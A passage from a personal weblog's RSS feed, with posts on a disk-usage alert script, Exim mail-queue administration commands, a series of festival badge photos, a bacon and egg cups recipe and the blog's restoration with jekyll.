  6581.                print $0
  6582.        }
  6583. }'</pre>
  6585. <p>Save it under /root/ and create the following crontab entry to check the disk usage every day at half past midnight.</p>
  6587. <pre>30  0  *   *   *     /root/</pre>
  6589. <p>Assuming your host has configured an MTA and defined a recipient for root@&lt;yourhost&gt;, you should get an e-mail whenever a disk is more than 75% full.</p>
  6590. ]]></description>
  6591.    <content:encoded><![CDATA[<p>Quick and dirty way to get an alert before your server starts to go crazy because of a full disk.</p>
  6593. <p>This script checks if a disk is more than 75% full.</p>
  6595. <pre>#!/bin/bash
  6597. df -h | awk '/%/ {
  6598.        limit = 75
  6599.        percent = sprintf("%d",$5)
  6600.        if ( percent > limit ) {
  6601.                print "Warning: ",$6," (",$1,") is to ",percent,"% full:"
  6602.                print $0
  6603.        }
  6604. }'</pre>
  6606. <p>Save it under /root/ and create the following crontab entry to check the disk usage every day at half past midnight.</p>
  6608. <pre>30  0  *   *   *     /root/</pre>
  6610. <p>Assuming your host has configured an MTA and defined a recipient for root@&lt;yourhost&gt;, you should get an e-mail whenever a disk is more than 75% full.</p>
  6611. ]]></content:encoded>
  6612.  </item>
  6614.  <item>
  6615.    <title>Balelec 2008</title>
  6616.    <link></link>
  6617.    <guid isPermaLink="true"></guid>
  6618.    <dc:creator>Andreas Jaggi</dc:creator>
  6619.    <creativeCommons:license></creativeCommons:license>
  6620.    <pubDate>Sat, 17 Dec 2011 10:10:00 +0100</pubDate>
  6621.    <category domain="">Badges</category>
  6622.    <description><![CDATA[<p>Now on to the badges of 2008, as every year: <a href="" title="Festival Balelec EPFL">Festival Balelec 2008</a></p>
  6623. <p><img src="" alt="Festival Balelec 2008" height="271" width="184"></p>
  6624. ]]></description>
  6625.    <content:encoded><![CDATA[<p>Now on to the badges of 2008, as every year: <a href="" title="Festival Balelec EPFL">Festival Balelec 2008</a></p>
  6626. <p><img src="" alt="Festival Balelec 2008" height="271" width="184"></p>
  6627. ]]></content:encoded>
  6628.  </item>
  6630.  <item>
  6631.    <title>iPhone PIN bruteforce</title>
  6632.    <link></link>
  6633.    <guid isPermaLink="true"></guid>
  6634.    <dc:creator>Andreas Jaggi</dc:creator>
  6635.    <creativeCommons:license></creativeCommons:license>
  6636.    <pubDate>Fri, 16 Dec 2011 08:20:00 +0100</pubDate>
  6637.    <category domain="">Misc</category>
  6638.    <description><![CDATA[<p><a href="" title="c't: iPhone-Sperre nahezu nutzlos - YouTube">c't: iPhone-Sperre nahezu nutzlos</a></p>
  6639. <p>(via <a href="" title="vowe dot net :: Eine vierstellige PIN ist zu schwach"></a>)</p>
  6640. ]]></description>
  6641.    <content:encoded><![CDATA[<p><a href="" title="c't: iPhone-Sperre nahezu nutzlos - YouTube">c't: iPhone-Sperre nahezu nutzlos</a></p>
  6642. <p>(via <a href="" title="vowe dot net :: Eine vierstellige PIN ist zu schwach"></a>)</p>
  6643. ]]></content:encoded>
  6644.  </item>
  6646.  <item>
  6647.    <title>Caprices 2009</title>
  6648.    <link></link>
  6649.    <guid isPermaLink="true"></guid>
  6650.    <dc:creator>Andreas Jaggi</dc:creator>
  6651.    <creativeCommons:license></creativeCommons:license>
  6652.    <pubDate>Fri, 16 Dec 2011 08:15:00 +0100</pubDate>
  6653.    <category domain="">Badges</category>
  6654.    <description><![CDATA[<p>The only time (for now) when I got to fly in a helicopter for a music festival was at: <a href="" title="Caprices Festival">Caprices 2009</a></p>
  6655. <p><img src="" alt="Caprices 2009" height="156" width="244"></p>
  6656. ]]></description>
  6657.    <content:encoded><![CDATA[<p>The only time (for now) when I got to fly in a helicopter for a music festival was at: <a href="" title="Caprices Festival">Caprices 2009</a></p>
  6658. <p><img src="" alt="Caprices 2009" height="156" width="244"></p>
  6659. ]]></content:encoded>
  6660.  </item>
  6662.  <item>
  6663.    <title>Balelec 2009</title>
  6664.    <link></link>
  6665.    <guid isPermaLink="true"></guid>
  6666.    <dc:creator>Andreas Jaggi</dc:creator>
  6667.    <creativeCommons:license></creativeCommons:license>
  6668.    <pubDate>Thu, 15 Dec 2011 08:37:00 +0100</pubDate>
  6669.    <category domain="">Badges</category>
  6670.    <description><![CDATA[<p>And once more there is a badge from: <a href="" title="Festival Balelec EPFL">Festival Balelec 2009</a></p>
  6671. <p><img src="" alt="Festival Balelec 2009" height="271" width="184"></p>
  6672. ]]></description>
  6673.    <content:encoded><![CDATA[<p>And once more there is a badge from: <a href="" title="Festival Balelec EPFL">Festival Balelec 2009</a></p>
  6674. <p><img src="" alt="Festival Balelec 2009" height="271" width="184"></p>
  6675. ]]></content:encoded>
  6676.  </item>
  6678.  <item>
  6679.    <title>Festival de la terre 2009</title>
  6680.    <link></link>
  6681.    <guid isPermaLink="true"></guid>
  6682.    <dc:creator>Andreas Jaggi</dc:creator>
  6683.    <creativeCommons:license></creativeCommons:license>
  6684.    <pubDate>Wed, 14 Dec 2011 12:44:00 +0100</pubDate>
  6685.    <category domain="">Badges</category>
  6686.    <description><![CDATA[<p>Here comes the largest badge in my collection: <a href="" title="Festival de la terre (">Festival de la terre 2009</a></p>
  6687. <p><img src="" alt="Festival de la terre 2009" height="418" width="300"></p>
  6688. ]]></description>
  6689.    <content:encoded><![CDATA[<p>Here comes the largest badge in my collection: <a href="" title="Festival de la terre (">Festival de la terre 2009</a></p>
  6690. <p><img src="" alt="Festival de la terre 2009" height="418" width="300"></p>
  6691. ]]></content:encoded>
  6692.  </item>
  6694.  <item>
  6695.    <title>Montreux Jazz 2009</title>
  6696.    <link></link>
  6697.    <guid isPermaLink="true"></guid>
  6698.    <dc:creator>Andreas Jaggi</dc:creator>
  6699.    <creativeCommons:license></creativeCommons:license>
  6700.    <pubDate>Tue, 13 Dec 2011 07:44:00 +0100</pubDate>
  6701.    <category domain="">Badges</category>
  6702.    <description><![CDATA[<p>Probably the most 'famous' badge in my collection: <a href="" title="Montreux Jazz Festival">Montreux Jazz Festival 2009</a></p>
  6703. <p><img src="" alt="Montreux Jazz 2009" height="407" width="274"></p>
  6704. ]]></description>
  6705.    <content:encoded><![CDATA[<p>Probably the most 'famous' badge in my collection: <a href="" title="Montreux Jazz Festival">Montreux Jazz Festival 2009</a></p>
  6706. <p><img src="" alt="Montreux Jazz 2009" height="407" width="274"></p>
  6707. ]]></content:encoded>
  6708.  </item>
  6710.  <item>
  6711.    <title>Metropop 2009</title>
  6712.    <link></link>
  6713.    <guid isPermaLink="true"></guid>
  6714.    <dc:creator>Andreas Jaggi</dc:creator>
  6715.    <creativeCommons:license></creativeCommons:license>
  6716.    <pubDate>Mon, 12 Dec 2011 05:44:00 +0100</pubDate>
  6717.    <category domain="">Badges</category>
  6718.    <description><![CDATA[<p>With the 2009 badges, I can almost fill another week. Let's start with: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2009</a></p>
  6719. <p><img src="" alt="Metropop 2009" height="238" width="171"></p>
  6720. ]]></description>
  6721.    <content:encoded><![CDATA[<p>With the 2009 badges, I can almost fill another week. Let's start with: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2009</a></p>
  6722. <p><img src="" alt="Metropop 2009" height="238" width="171"></p>
  6723. ]]></content:encoded>
  6724.  </item>
  6726.  <item>
  6727.    <title>(Mini) Bacon and Egg Cups</title>
  6728.    <link></link>
  6729.    <guid isPermaLink="true"></guid>
  6730.    <dc:creator>Andreas Jaggi</dc:creator>
  6731.    <creativeCommons:license></creativeCommons:license>
  6732.    <pubDate>Sun, 11 Dec 2011 18:55:00 +0100</pubDate>
  6733.    <category domain="">Food</category>
  6734.    <description><![CDATA[<p>Last week I stumbled upon this delicious looking <a href="" title="How To: Simplify: Bacon and Egg Cups">bacon and egg cups recipe</a> and thought that I should try it sometimes, which I did this morning.<br>
  6735. Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).</p>
  6737. <p><img src="" alt="Bread with holes" width="439" height="386"><br>This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)</p>
  6739. <p>
  6740. Ingredients:
  6741. </p>
  6742. <ul>
  6743. <li>1 slice of bread per muffin cup (1 slice per 4 cups for the 'mini' version)</li>
  6744. <li>2 slices of bacon per muffing cup (use small slices for the 'mini' version)</li>
  6745. <li>1 egg per muffin cup (same for the 'mini' version)</li>
  6746. <li>1 tablespoon shredded cheddar cheese per muffin cup (optional, I used some parmesan instead)</li>
  6747. <li>salt and pepper to taste</li>
  6748. </ul>
  6750. <p>
  6751. Directions:
  6752. </p>
  6753. <ol>
  6754. <li>Preheat oven to 375 degrees.<br>(that's 190 degrees celsius)</li>
  6755. <li>Use a cookie cutter to cut circles out of each piece of bread.</li>
  6756. <li>Grease a muffin tin and press circles of bread in the muffin cups. Place in the oven and bake for 5 minutes or until bread is slightly toasted. Remove from oven.<br>(be careful when doing the 'mini' version, your bread will be toasted in well under 5 minutes)</li>
  6757. <li>Cook bacon in a skillet until halfway cooked (approximately 3-4 minutes).<br>(here again: when using small bacon slices they will be ready in less than a minute, be careful to not make them too crispy otherwise they will be hard to fit into the cups)</li>
  6758. <li>Place 2 slices of bacon on top of the pieces of bread to form a cup (the bacon should cover the bread and the sides of each cup).</li>
  6759. <li>Crack an egg into each muffin cup (on top of the bacon). It helps to discard a little bit of the egg white after cracking and before pouring into the muffin cup.<br>(for the 'mini' version keep the surplus egg white in a bowl and use it to make some 'only-white' cups, one egg gives enough surplus egg white for another cup)</li>
  6760. <li>Place in the oven and bake for 18-20 minutes or until the eggs are set.<br>(for the 'mini' version use 8-10 minutes, I almost burned mine!)</li>
  6761. <li>Sprinkle cheddar cheese over each egg and continue to bake until cheese is melted (this step is optional).</li>
  6762. <li>Season with salt and pepper to taste and serve.</li>
  6763. </ol>
  6764. <p>
  6765. Enjoy!
  6766. </p>
  6767. <p>
  6768. <img src="" alt="bacon and egg cups" width="429" height="518">
  6769. </p>
  6771. <p>
  6772. <img src="" alt="bacon and egg cups sideview" width="440" height="269">
  6773. </p>
  6774. <p>The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)</p>
  6775. <p>
  6776. <img src="" alt="plate full of bacon and egg cups" width="440" height="429">
  6777. </p>
  6778. ]]></description>
  6779.    <content:encoded><![CDATA[<p>Last week I stumbled upon this delicious looking <a href="" title="How To: Simplify: Bacon and Egg Cups">bacon and egg cups recipe</a> and thought that I should try it sometimes, which I did this morning.<br>
  6780. Since I don't have a real muffin tin I used a somewhat smaller cake tin, with the result that the handling was a bit more delicate and also my cups are more like 'mini' cups (which is not necessarily a bad thing because the bacon I bought was also smaller than expected and thus it matched perfectly).</p>
  6782. <p><img src="" alt="Bread with holes" width="439" height="386"><br>This is the result of the first step in the recipe and all what is leftover once I was finished. Not very useful for putting jam on it anymore, but perfect to stir the next cheese fondue :-)</p>
  6784. <p>
  6785. Ingredients:
  6786. </p>
  6787. <ul>
  6788. <li>1 slice of bread per muffin cup (1 slice per 4 cups for the 'mini' version)</li>
  6789. <li>2 slices of bacon per muffing cup (use small slices for the 'mini' version)</li>
  6790. <li>1 egg per muffin cup (same for the 'mini' version)</li>
  6791. <li>1 tablespoon shredded cheddar cheese per muffin cup (optional, I used some parmesan instead)</li>
  6792. <li>salt and pepper to taste</li>
  6793. </ul>
  6795. <p>
  6796. Directions:
  6797. </p>
  6798. <ol>
  6799. <li>Preheat oven to 375 degrees.<br>(that's 190 degrees celsius)</li>
  6800. <li>Use a cookie cutter to cut circles out of each piece of bread.</li>
  6801. <li>Grease a muffin tin and press circles of bread in the muffin cups. Place in the oven and bake for 5 minutes or until bread is slightly toasted. Remove from oven.<br>(be careful when doing the 'mini' version, your bread will be toasted in well under 5 minutes)</li>
  6802. <li>Cook bacon in a skillet until halfway cooked (approximately 3-4 minutes).<br>(here again: when using small bacon slices they will be ready in less than a minute, be careful to not make them too crispy otherwise they will be hard to fit into the cups)</li>
  6803. <li>Place 2 slices of bacon on top of the pieces of bread to form a cup (the bacon should cover the bread and the sides of each cup).</li>
  6804. <li>Crack an egg into each muffin cup (on top of the bacon). It helps to discard a little bit of the egg white after cracking and before pouring into the muffin cup.<br>(for the 'mini' version keep the surplus egg white in a bowl and use it to make some 'only-white' cups, one egg gives enough surplus egg white for another cup)</li>
  6805. <li>Place in the oven and bake for 18-20 minutes or until the eggs are set.<br>(for the 'mini' version use 8-10 minutes, I almost burned mine!)</li>
  6806. <li>Sprinkle cheddar cheese over each egg and continue to bake until cheese is melted (this step is optional).</li>
  6807. <li>Season with salt and pepper to taste and serve.</li>
  6808. </ol>
  6809. <p>
  6810. Enjoy!
  6811. </p>
  6812. <p>
  6813. <img src="" alt="bacon and egg cups" width="429" height="518">
  6814. </p>
  6816. <p>
  6817. <img src="" alt="bacon and egg cups sideview" width="440" height="269">
  6818. </p>
  6819. <p>The advantage of my 'mini' version is that you will end up having plenty of little bacon and egg cups, yummy :-)</p>
  6820. <p>
  6821. <img src="" alt="plate full of bacon and egg cups" width="440" height="429">
  6822. </p>
  6823. ]]></content:encoded>
  6824.  </item>
  6826.  <item>
  6827.    <title>Caprices 2010</title>
  6828.    <link></link>
  6829.    <guid isPermaLink="true"></guid>
  6830.    <dc:creator>Andreas Jaggi</dc:creator>
  6831.    <creativeCommons:license></creativeCommons:license>
  6832.    <pubDate>Sun, 11 Dec 2011 11:35:00 +0100</pubDate>
  6833.    <category domain="">Badges</category>
  6834.    <description><![CDATA[<p>Right at the beginning of spring, in the beautiful mountains of <a href="" title="Crans-Montana">Crans-Montana</a>, there is: <a href="" title="Caprices Festival">Caprices 2010</a></p>
  6835. <p><img src="" alt="Caprices 2010" height="155" width="242"></p>
  6836. ]]></description>
  6837.    <content:encoded><![CDATA[<p>Right at the beginning of spring, in the beautiful mountains of <a href="" title="Crans-Montana">Crans-Montana</a>, there is: <a href="" title="Caprices Festival">Caprices 2010</a></p>
  6838. <p><img src="" alt="Caprices 2010" height="155" width="242"></p>
  6839. ]]></content:encoded>
  6840.  </item>
  6842.  <item>
  6843.    <title>Artiphys 2010</title>
  6844.    <link></link>
  6845.    <guid isPermaLink="true"></guid>
  6846.    <dc:creator>Andreas Jaggi</dc:creator>
  6847.    <creativeCommons:license></creativeCommons:license>
  6848.    <pubDate>Sat, 10 Dec 2011 09:36:00 +0100</pubDate>
  6849.    <category domain="">Badges</category>
  6850.    <description><![CDATA[<p>Also this one took place in 2010: <a href="" title="Festival Artiphys">Artiphys 2010</a></p>
  6851. <p><img src="" alt="Artiphys 2010" height="279" width="354"></p>
  6852. ]]></description>
  6853.    <content:encoded><![CDATA[<p>Also this one took place in 2010: <a href="" title="Festival Artiphys">Artiphys 2010</a></p>
  6854. <p><img src="" alt="Artiphys 2010" height="279" width="354"></p>
  6855. ]]></content:encoded>
  6856.  </item>
  6858.  <item>
  6859.    <title>Balelec 2010</title>
  6860.    <link></link>
  6861.    <guid isPermaLink="true"></guid>
  6862.    <dc:creator>Andreas Jaggi</dc:creator>
  6863.    <creativeCommons:license></creativeCommons:license>
  6864.    <pubDate>Fri, 09 Dec 2011 00:37:00 +0100</pubDate>
  6865.    <category domain="">Badges</category>
  6866.    <description><![CDATA[<p>Like almost every year, there is a badge from: <a href="" title="Festival Balelec EPFL">Festival Balelec 2010</a></p>
  6867. <p><img src="" alt="Festival Balelec 2010" height="270" width="189"></p>
  6868. ]]></description>
  6869.    <content:encoded><![CDATA[<p>Like almost every year, there is a badge from: <a href="" title="Festival Balelec EPFL">Festival Balelec 2010</a></p>
  6870. <p><img src="" alt="Festival Balelec 2010" height="270" width="189"></p>
  6871. ]]></content:encoded>
  6872.  </item>
  6874.  <item>
  6875.    <title>Metropop 2010</title>
  6876.    <link></link>
  6877.    <guid isPermaLink="true"></guid>
  6878.    <dc:creator>Andreas Jaggi</dc:creator>
  6879.    <creativeCommons:license></creativeCommons:license>
  6880.    <pubDate>Thu, 08 Dec 2011 07:44:00 +0100</pubDate>
  6881.    <category domain="">Badges</category>
  6882.    <description><![CDATA[<p>Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2010</a></p>
  6883. <p><img src="" alt="Metropop 2010" height="246" width="151"></p>
  6884. ]]></description>
  6885.    <content:encoded><![CDATA[<p>Looks like most of the 2011 badges are done. Now on to the 2010 ones, starting with: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2010</a></p>
  6886. <p><img src="" alt="Metropop 2010" height="246" width="151"></p>
  6887. ]]></content:encoded>
  6888.  </item>
  6890.  <item>
  6891.    <title>Caprices 2011</title>
  6892.    <link></link>
  6893.    <guid isPermaLink="true"></guid>
  6894.    <dc:creator>Andreas Jaggi</dc:creator>
  6895.    <creativeCommons:license></creativeCommons:license>
  6896.    <pubDate>Wed, 07 Dec 2011 14:15:00 +0100</pubDate>
  6897.    <category domain="">Badges</category>
  6898.    <description><![CDATA[<p>And there comes the next music festival: <a href="" title="Caprices Festival">Caprices 2011</a></p>
  6899. <p><img src="" alt="Caprices 2011" height="150" width="240"></p>
  6900. ]]></description>
  6901.    <content:encoded><![CDATA[<p>And there comes the next music festival: <a href="" title="Caprices Festival">Caprices 2011</a></p>
  6902. <p><img src="" alt="Caprices 2011" height="150" width="240"></p>
  6903. ]]></content:encoded>
  6904.  </item>
  6906.  <item>
  6907.    <title>Artiphys 2011</title>
  6908.    <link></link>
  6909.    <guid isPermaLink="true"></guid>
  6910.    <dc:creator>Andreas Jaggi</dc:creator>
  6911.    <creativeCommons:license></creativeCommons:license>
  6912.    <pubDate>Tue, 06 Dec 2011 07:45:00 +0100</pubDate>
  6913.    <category domain="">Badges</category>
  6914.    <description><![CDATA[<p>Another student music festival from <a href="" title="EPFL">EPFL</a>: <a href="" title="Festival Artiphys">Artiphys 2011</a></p>
  6915. <p><img src="" alt="Artiphys 2011" height="314" width="213"></p>
  6916. ]]></description>
  6917.    <content:encoded><![CDATA[<p>Another student music festival from <a href="" title="EPFL">EPFL</a>: <a href="" title="Festival Artiphys">Artiphys 2011</a></p>
  6918. <p><img src="" alt="Artiphys 2011" height="314" width="213"></p>
  6919. ]]></content:encoded>
  6920.  </item>
  6922.  <item>
  6923.    <title>Sat Rocks IV</title>
  6924.    <link></link>
  6925.    <guid isPermaLink="true"></guid>
  6926.    <dc:creator>Andreas Jaggi</dc:creator>
  6927.    <creativeCommons:license></creativeCommons:license>
  6928.    <pubDate>Mon, 05 Dec 2011 05:20:00 +0100</pubDate>
  6929.    <category domain="">Badges</category>
  6930.    <description><![CDATA[<p>Again a badge from a music festival: <a href="" title="Sat Rocks, le festival de Satellite">Sat Rocks IV</a></p>
  6931. <p><img src="" alt="Sat Rocks IV, c'est chouette" height="287" width="199"></p>
  6932. ]]></description>
  6933.    <content:encoded><![CDATA[<p>Again a badge from a music festival: <a href="" title="Sat Rocks, le festival de Satellite">Sat Rocks IV</a></p>
  6934. <p><img src="" alt="Sat Rocks IV, c'est chouette" height="287" width="199"></p>
  6935. ]]></content:encoded>
  6936.  </item>
  6938.  <item>
  6939.    <title>MoleKul'Air</title>
  6940.    <link></link>
  6941.    <guid isPermaLink="true"></guid>
  6942.    <dc:creator>Andreas Jaggi</dc:creator>
  6943.    <creativeCommons:license></creativeCommons:license>
  6944.    <pubDate>Sun, 04 Dec 2011 12:55:00 +0100</pubDate>
  6945.    <category domain="">Badges</category>
  6946.    <description><![CDATA[<p>The next badge is from a concert (or rather a series of three concerts): <a href="" title="MoleKul'Air (">MoleKul'Air</a></p>
  6947. <p><img src="" alt="MoleKul'Air 2011" height="248" width="156"></p>
  6948. ]]></description>
  6949.    <content:encoded><![CDATA[<p>The next badge is from a concert (or rather a series of three concerts): <a href="" title="MoleKul'Air (">MoleKul'Air</a></p>
  6950. <p><img src="" alt="MoleKul'Air 2011" height="248" width="156"></p>
  6951. ]]></content:encoded>
  6952.  </item>
  6954.  <item>
  6955.    <title>Balelec 2011</title>
  6956.    <link></link>
  6957.    <guid isPermaLink="true"></guid>
  6958.    <dc:creator>Andreas Jaggi</dc:creator>
  6959.    <creativeCommons:license></creativeCommons:license>
  6960.    <pubDate>Sat, 03 Dec 2011 12:55:00 +0100</pubDate>
  6961.    <category domain="">Badges</category>
  6962.    <description><![CDATA[<p>Another badge from a music festival: <a href="" title="Festival Balelec EPFL">Festival Balelec 2011</a></p>
  6963. <p><img src="" alt="Festival Balelec 2011" height="287" width="205"></p>
  6964. ]]></description>
  6965.    <content:encoded><![CDATA[<p>Another badge from a music festival: <a href="" title="Festival Balelec EPFL">Festival Balelec 2011</a></p>
  6966. <p><img src="" alt="Festival Balelec 2011" height="287" width="205"></p>
  6967. ]]></content:encoded>
  6968.  </item>
  6970.  <item>
  6971.    <title>Metropop 2011</title>
  6972.    <link></link>
  6973.    <guid isPermaLink="true"></guid>
  6974.    <dc:creator>Andreas Jaggi</dc:creator>
  6975.    <creativeCommons:license></creativeCommons:license>
  6976.    <pubDate>Fri, 02 Dec 2011 08:02:00 +0100</pubDate>
  6977.    <category domain="">Badges</category>
  6978.    <description><![CDATA[<p>Here comes the next badge. This time not from a tech conference but from a music festival: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2011</a></p>
  6979. <p><img src="" alt="Metropop Festival 2011" height="244" width="153"></p>
  6980. <p>For insiders, there is also a view of the <a href="" title="Badge backside">backside</a> :-)</p>
  6981. ]]></description>
  6982.    <content:encoded><![CDATA[<p>Here comes the next badge. This time not from a tech conference but from a music festival: <a href="" title="Metropop Festival Lausanne">Metropop Festival 2011</a></p>
  6983. <p><img src="" alt="Metropop Festival 2011" height="244" width="153"></p>
  6984. <p>For insiders, there is also a view of the <a href="" title="Badge backside">backside</a> :-)</p>
  6985. ]]></content:encoded>
  6986.  </item>
  6988.  <item>
  6989.    <title>Badges</title>
  6990.    <link></link>
  6991.    <guid isPermaLink="true"></guid>
  6992.    <dc:creator>Andreas Jaggi</dc:creator>
  6993.    <creativeCommons:license></creativeCommons:license>
  6994.    <pubDate>Thu, 01 Dec 2011 00:00:00 +0100</pubDate>
  6995.    <category domain="">Badges</category>
  6996.    <description><![CDATA[<p>When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).
  6997. Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.</p>
  6998. <p>Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new <a href="" title="Badges">Badges</a> category in the weblog.</p>
  6999. <p>My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.</p>
  7000. <p>Here is the first one, it is from the <a href="" title="IPv6 Business Konferenz">IPv6 Business Konferenz</a>:<br>
  7001. <img src="" alt="IPv6 Konferenz 2011" height="161" width="247">
  7002. </p>
  7003. ]]></description>
  7004.    <content:encoded><![CDATA[<p>When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).
  7005. Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.</p>
  7006. <p>Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new <a href="" title="Badges">Badges</a> category in the weblog.</p>
  7007. <p>My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.</p>
  7008. <p>Here is the first one, it is from the <a href="" title="IPv6 Business Konferenz">IPv6 Business Konferenz</a>:<br>
  7009. <img src="" alt="IPv6 Konferenz 2011" height="161" width="247">
  7010. </p>
  7011. ]]></content:encoded>
  7012.  </item>
  7014.  <item>
  7015.    <title>Online Again</title>
  7016.    <link></link>
  7017.    <guid isPermaLink="true"></guid>
  7018.    <dc:creator>Andreas Jaggi</dc:creator>
  7019.    <creativeCommons:license></creativeCommons:license>
  7020.    <pubDate>Sat, 26 Nov 2011 15:47:00 +0100</pubDate>
  7021.    <category domain="">Misc</category>
  7022.    <description><![CDATA[<p>The database which previously powered this weblog vanished without a trace two years ago and people only got some PHP/XML error when surfing this site since then. Unfortunately the last backup of the database was more than four years old...</p>
  7023. <p>To restore the content of this weblog the Webarchive from <a href="" title=""></a> was parsed with the help of some scripts in order to extract the missing posts. The resulting data was cross-checked with the last database backup and the generated static RSS feed files. <br>Then all the posts with their meta information were converted and stored in the appropriate format for the new system. Finally the layout was migrated to the new system and some glue files were created in order to provide backwards compatibility for the old link format.</p>
  7024. <p>After two months of restore/migration/polishing work the weblog is now online again, powered by <a href="">jekyll</a> and currently hosted with <a href="">GitHub Pages</a>.</p>
  7025. ]]></description>
  7026.    <content:encoded><![CDATA[<p>The database which previously powered this weblog vanished without a trace two years ago and people only got some PHP/XML error when surfing this site since then. Unfortunately the last backup of the database was more than four years old...</p>
  7027. <p>To restore the content of this weblog the Webarchive from <a href="" title=""></a> was parsed with the help of some scripts in order to extract the missing posts. The resulting data was cross-checked with the last database backup and the generated static RSS feed files. <br>Then all the posts with their meta information were converted and stored in the appropriate format for the new system. Finally the layout was migrated to the new system and some glue files were created in order to provide backwards compatibility for the old link format.</p>
  7028. <p>After two months of restore/migration/polishing work the weblog is now online again, powered by <a href="">jekyll</a> and currently hosted with <a href="">GitHub Pages</a>.</p>
  7029. ]]></content:encoded>
  7030.  </item>
  7032.  <item>
  7033.    <title>Unfreeze messages in Exim queue</title>
  7034.    <link></link>
  7035.    <guid isPermaLink="true"></guid>
  7036.    <dc:creator>Andreas Jaggi</dc:creator>
  7037.    <creativeCommons:license></creativeCommons:license>
  7038.    <pubDate>Tue, 28 Jul 2009 22:25:00 +0200</pubDate>
  7039.    <category domain="">Linux</category>
  7040.    <description><![CDATA[<p>To process all **frozen** messages in the Exim queue use this command:</p>
  7042. <pre>mailq | grep frozen | awk '{print $3}' | xargs exim -v -M</pre>
  7043. ]]></description>
  7044.    <content:encoded><![CDATA[<p>To process all **frozen** messages in the Exim queue use this command:</p>
  7046. <pre>mailq | grep frozen | awk '{print $3}' | xargs exim -v -M</pre>
  7047. ]]></content:encoded>
  7048.  </item>
  7050.  <item>
  7051.    <title>Remove all messages in the Exim queue</title>
  7052.    <link></link>
  7053.    <guid isPermaLink="true"></guid>
  7054.    <dc:creator>Andreas Jaggi</dc:creator>
  7055.    <creativeCommons:license></creativeCommons:license>
  7056.    <pubDate>Tue, 10 Mar 2009 14:50:00 +0100</pubDate>
  7057.    <category domain="">Linux</category>
  7058.    <description><![CDATA[<p>To whipe the Exim message queue use the following command:</p>
  7060. <pre>exim -bp | exiqgrep -i | xargs exim -Mrm</pre>
  7061. ]]></description>
  7062.    <content:encoded><![CDATA[<p>To whipe the Exim message queue use the following command:</p>
  7064. <pre>exim -bp | exiqgrep -i | xargs exim -Mrm</pre>
  7065. ]]></content:encoded>
  7066.  </item>
  7068.  <item>
  7069.    <title>Prevent Exim4 from using up all disk space on Debian</title>
  7070.    <link></link>
  7071.    <guid isPermaLink="true"></guid>
  7072.    <dc:creator>Andreas Jaggi</dc:creator>
  7073.    <creativeCommons:license></creativeCommons:license>
  7074.    <pubDate>Fri, 06 Mar 2009 10:20:00 +0100</pubDate>
  7075.    <category domain="">Linux</category>
  7076.    <description><![CDATA[<p>Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:</p>
  7078. <pre>check_spool_space=100M</pre>
  7080. <p>
  7082. This refuses incoming messages with a "452 Space shortage, please try later" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.
  7084. </p>
  7085. ]]></description>
  7086.    <content:encoded><![CDATA[<p>Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:</p>
  7088. <pre>check_spool_space=100M</pre>
  7090. <p>
  7092. This refuses incoming messages with a "452 Space shortage, please try later" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.
  7094. </p>
  7095. ]]></content:encoded>
  7096.  </item>
  7098.  <item>
  7099.    <title>PDM TODO Performance</title>
  7100.    <link></link>
  7101.    <guid isPermaLink="true"></guid>
  7102.    <dc:creator>Andreas Jaggi</dc:creator>
  7103.    <creativeCommons:license></creativeCommons:license>
  7104.    <pubDate>Wed, 04 Mar 2009 16:23:00 +0100</pubDate>
  7105.    <category domain="">School</category>
  7106.    <description><![CDATA[<p>
  7108. <img src="" alt="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." title="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." width="576" height="403" style="border:0;">
  7110. </p>
  7111. ]]></description>
  7112.    <content:encoded><![CDATA[<p>
  7114. <img src="" alt="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." title="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." width="576" height="403" style="border:0;">
  7116. </p>
  7117. ]]></content:encoded>
  7118.  </item>
  7120.  <item>
  7121.    <title>Gmail problems</title>
  7122.    <link></link>
  7123.    <guid isPermaLink="true"></guid>
  7124.    <dc:creator>Andreas Jaggi</dc:creator>
  7125.    <creativeCommons:license></creativeCommons:license>
  7126.    <pubDate>Tue, 24 Feb 2009 13:11:00 +0100</pubDate>
  7127.    <category domain="">Misc</category>
  7128.    <description><![CDATA[<p>This comment on the Gmail problems made my day:</p>
  7130. <blockquote><p>
  7132. They're testing their new offline feature :)
  7134. </p></blockquote>
  7136. <p>(<a href="" title="">via</a>)</p>
  7137. ]]></description>
  7138.    <content:encoded><![CDATA[<p>This comment on the Gmail problems made my day:</p>
  7140. <blockquote><p>
  7142. They're testing their new offline feature :)
  7144. </p></blockquote>
  7146. <p>(<a href="" title="">via</a>)</p>
  7147. ]]></content:encoded>
  7148.  </item>
  7150.  <item>
  7151.    <title>Music for a hard wake-up in the morning II</title>
  7152.    <link></link>
  7153.    <guid isPermaLink="true"></guid>
  7154.    <dc:creator>Andreas Jaggi</dc:creator>
